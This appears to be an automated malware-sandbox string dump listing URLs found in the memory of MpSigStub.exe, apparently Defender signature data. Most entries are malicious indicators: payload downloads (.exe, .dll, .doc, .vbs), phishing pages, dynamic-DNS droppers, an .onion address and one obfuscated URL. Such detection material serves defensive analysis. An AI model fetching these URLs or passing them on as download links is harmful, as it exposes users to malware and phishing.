Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://mysibrand.info/e.js
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://mysibrand.info/s.js
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://mytube.4l.cl/?id=4&watch=zryxo7
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://mytube.hs.vc/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://n7pv51t.sed.odtllc.net
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.cn/cn.dll
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.cn/cn.dll?charset=utf-8&name=
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://name.cnnic.cn/cn.dll?pid=
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://nameservicehosting3.in//load.php?spl=javad
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://nathannewman.org/wp-content/themes/boldnews/includes/js/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://navigation.iwatchavi.com/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://navsmart.info
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://ncccnnnc.cn/img/index.php
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://netmahal.portalsepeti.com/?bd=sc&oem=ntsvc&uid=
Source: MpSigStub.exe, 00000026.00000003.18333498606.00000138BCD46000.00000004.00000001.sdmp	String found in binary or memory: http://network.nocreditcard.com/DialHTML
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/final.php3
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://network.nocreditcard.com/DialHTML/OSB/wait.php3
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://networksecurityx.hopto.org
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://nevefe.com/wp-content/themes/calliope/wp-front.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://nevergreen.net/456
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://new.beahh.com/startup.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://news.7654.com/mini_new3
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://newsibrand.info/e.js
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://newsibrand.info/f2/f.js
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://newsibrand.info/s.js
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://newsystemlaunchwithnewmethodforserverfil.duckdns.org/document_v_001241.doc
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://nfinx.info
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://nh4esf33e.from-ia.com/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://nicescroll.areaaperta.com
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://nid-help-pchange.atwebpages.com/home/web/download.php?filename=%s&key=%s
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://nid-help-pchange.atwebpages.com/home/web/post.php
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://nimabi7.gnway.cc/seoul/kics/login.html
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: http://no.sinabc.net/abc.exe
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://novacf.org/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://nownowsales.com/wp-admin/ulpbz/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://ns1.natalnosso.info:8082/windows.pac
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://ns33617.ovh.net/~clubregi/cartaoht.exe
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Errorx
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://nt010.cn/e/j.js
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://nta.hopto.org/mpa/nd.doc
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	String found in binary or memory: http://nthnuest.com:40000/tickets
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://nutricaoedesenvolvimento.com.br/i/i.sct
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://o%66%66%49%63e%2e%46%41q%53%65%72v.%43%6f%4d/%46%41%51%2e%6a%73
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: http://o1.o1wy.com/miss/
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: http://o1a.cn/Counter/NewCounter.asp?Param=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://office-archive-input.com/scan.wbk?raw=true
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://office-cleaner-indexes.com/project.rtf
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://office-cleaner-indexes.com/update.doc
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://officefiletransferintergration.mangospot.net/..-.............................................
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ogirikidanielifeanyi.com/wp-content/upgrade/neworder.html
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://ogp.me/ns
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://old.forwart.ru/paid-invoice-credit-card-receipt/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://omstreaming.net/omunelegende/xxx.min.js
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://on5.biz/docs/home/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://onecs-live.azureedge.net
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://onedrivenet.xyz/work/30.vbs
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://oneprivatecloudshareandfileprotectagenci.duckdns.org/receipt/invoice_651253.doc
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://online-docu-sign-st.com/yytr.png
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://online-security-center.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://online-stats201.info/ur.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://online.pdf.com.tropicaldesign.com.br/)
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://online2you.org/search.php?sid=1
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://onlinesearch4meds.com
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://onlinesecuritynet.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://oo.shmtb.info:888/phone.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://opendownloadmanager.com/privacy-policy.html
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://openym.info/pdf/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://opercomex.co/wp/wp-includes/images/wlw/don.html)
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://orcult.0lx.net/tcgeneration.htmg
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://os.tiviviv.com/Vittalia/
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://os.tiviviv.com/Vittalia/x
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://outfish.bounceme.net/outl.dot
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/1pyr308vbgz)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/6gex303pfnn)
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/QoHbJ
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/gwzp304opw4)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/gxqw308htwv)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/qiml30afntj)
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://ow.ly/tdiy30flmvv
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://owwwc.com/mm/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://p.b69kq.com/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://p.estonine.com
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://p.iask.com/p?k=%s
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://p.k3qh4.com/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://p.netund.com/go/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/p?w=%s
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://p6920.cloudserver255.com/0az7vjb9jbefbkmu#########
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://packetstorm.securify.com/0010-exploits/unicodexecute2.pl
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://pads289.net
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://page.zhongsou.com/ps?tps=2&cc=%s&aid=CA%s&w=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://painel.moboymoboy.site/paste.php?pw=
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://pancern.scotpaker.com.br/busterinjetc.zip
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://pankus.3utilities.com/bars/banner/decipher/preparations/mxdmfq.dot
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://pantscow.ru:8080/vector_graphic.js
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://partners.sena.com/doc/inv-
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://passagensvhc.online/66.rtf
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/L774bn1U
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/L774bn1Ux
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://patriciasmith.co.za/excelfolder/pdffiles)
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://patvenzklito.tk/wp/wp-includes/images/100.png
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://paufderhar07ol.ru.com/bb.html
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://pc-scan-online.com/l2.php?t=
Source: MpSigStub.exe, 00000026.00000003.18296654379.00000138BE355000.00000004.00000001.sdmp	String found in binary or memory: http://pcmaticplus.com/success.html
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://pcvark.com
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://perfectequipments.com/bm1/.tmp/.1.jstype=text/javascript
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://persefoni-rooms-toroni.gr/pdf/uzie/actions.php%22%20method%3d%22post
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://philippelaurent.org/rechnung/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://phimshock-share123vn.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://pic.sogou.com/pics?query=%s
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://picosoftnepal.net/ach-form/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://pig.zhongsou.com/helpsimple/help.htm
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://pig.zhongsou.com/pig3/dealip.asp?aa=%s&bb=%s
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://pilasto.host/po.exe
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://ping.180solutions.com
Source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp	String found in binary or memory: http://ping.bizhi.sogou.com/repair.gif
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://pingakshotechnologies.com/vicaaralife/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://pirsl.com.au/signatures/new.jpg
Source: MpSigStub.exe, 00000026.00000003.18333498606.00000138BCD46000.00000004.00000001.sdmp	String found in binary or memory: http://pki.digidentity.eu/validatie0
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://plaintexw.com/xx.dll
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://planilha.webcindario.com/planilha
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://play.videosongplayer.com/
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://playboy.com/search?SearchString=
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://playsong.mediasongplayer.com/
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://plugin-install.info/
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://plugin-installer.com/
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://plugin-installer.info/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://plugin.videosraros.info/chrome.xml
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://pluginprovider.com/?rap
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://pmevents.co.in/nd/index.php)
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://pmxmrnull.dynu.net:
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://pnronline.in/hiu.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://polifile.co/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://polk.freedynamicdns.org/boot/key.html
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://popall.com/lin/bbs.htm?code=talking&mode=1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://portal.usanativ.com/sites/default/files/nativsetup.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://portalconnectme.com/56778786598.doc
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://portoseguropromissao.com.br/wp-content/uploads/revslider/templates/80s/z/z/z/po.zip.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://post.medusaranch.com/abonento9.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://potosxylogicalnreinforcementagency4thsdy.duckdns.org/document/
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://ppdb2.stifar.ac.id/xwtaxkjqnq/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://premiumclass.bar/0pzional1a.dll
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://premiumclass.cyou/0pzional1a.dll
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://pricklypear.com/adobgran.php
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://private0091111.duckdns.org/qagj/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://protect.advancedcleaner.com/MjY5Mw==/2/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://protect.spyguardpro.com/MTkyNDE=/2/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://prs.payperdownload.nl
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://prs.payperdownload.nl/radius/dialer_admin/geoip
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://prs.payperdownload.nl/radius/dialer_admin/geoip.asp
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://psget.net/GetPsGet.ps1x
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://pssquared.com/invoice-status/tracking-number-and-invoice-of-your-order/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://psynergi.dk/data
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ptnetproject.info/yrniii/yrniii/yrniii/yrniii/index.php
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://pub03832.duckdns.org/rwab/image.png
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://pubs.vmware.com
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://pulp99.com/1.rtf
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://purelyrighteous.com/redirect/amvubmlmzxiubw9uy3jpzwzmqde4mjuuy29t
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://pursuitvision.com/templates/pursuitvision/images/hybrid-app/ms
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://pusat-hacing.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://pznjaslo.pl/wp-content/outstanding-invoices/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://qiiqur.com/frix.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://quantsa.ru/?de
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://qudaih.com/pzlnkda/nbsa
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://queendrinks.com.ar/open-past-due-orders/
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://quickinstallpack.com/quickinstall/order.php?qad=cln&qld=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://quickuploader.xyz/Kalkkulerne.exe
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://qwuyegasd3edarq6yu.org/mSsQDIMIQ/ind7694GDs/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://r%d.clrsch.com/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://r%d.clrsch.com/ie/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://r%d.clrsch.com/x
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://r.funmoods.com//
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://raa.qwepoii.org/v4/gtg/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://raggina.space/bc855646d052/spool/boot/acxbbz.dot
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://rbmllp.com/member.php
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://readlenta.ru/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://rebrand.ly/ohxnqak
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://recoverpcerror.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://redirect.sarahwilkesphotography.co.uk)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://reefer.parts/js/lib/)
